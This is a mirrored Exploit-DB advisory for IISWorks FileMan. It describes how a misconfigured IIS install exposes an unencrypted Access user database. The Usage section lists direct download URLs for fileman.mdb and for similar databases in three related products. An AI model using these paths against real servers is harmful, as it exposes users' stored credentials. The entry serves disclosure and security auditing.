bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/13886.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

48 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: IISWorks FileMan fileman.mdb Remote User Database
Disclosure
# Disclosure Date: July 5, 2005
# Author: Known Vulnerability
# Software Link: http://www.scriptdungeon.com/scripts/asp/FileManASP.rar
# Version:
# OSVDB: 17824
# Security Tracker ID: 1014383
# Found exploited in the wild by: Joey Furr (j0fer), Exploit-DB team
# On: May 10, 2010
# Found on: Windows Server 2003 Service Pack 2 version 5.2.3790
[+] Description
IISWorks FileMan is an .asp-based web interface meant to simplify the
process of uploading, downloading, and otherwise managing files on a
server.
The script uses an unencrypted Microsoft Access database file for user
and
permissions administration.
* If 'Read' permissions are not revoked in IIS on the /Database folder,
the user
db will be directly downloadable. The FileMan diags.asp installation
verification
script does not check for this permission setting.
[+] Usage
http://[Target]/fileman/Database/fileman.mdb
or
http://[Target]/[InstallDir]/Database/fileman.mdb
[+] Other Products from the same vendor with the same vulnerability
IISWorks ListPics listpics.mdb Remote User Database Disclosure
http://[target]/gallery/Database/listpics.mdb
IISWorks ASPKnowledgeBase kb.mdb Remote User Database Disclosure
http://[target]/KB/Databse/kb.mdb
IISWorks ASPWebMail Webmail.mdb Remote User Database Disclosure
http://[target]/Webmail/Database/Webmail.mdb
Reference in a new issue View git blame Copy permalink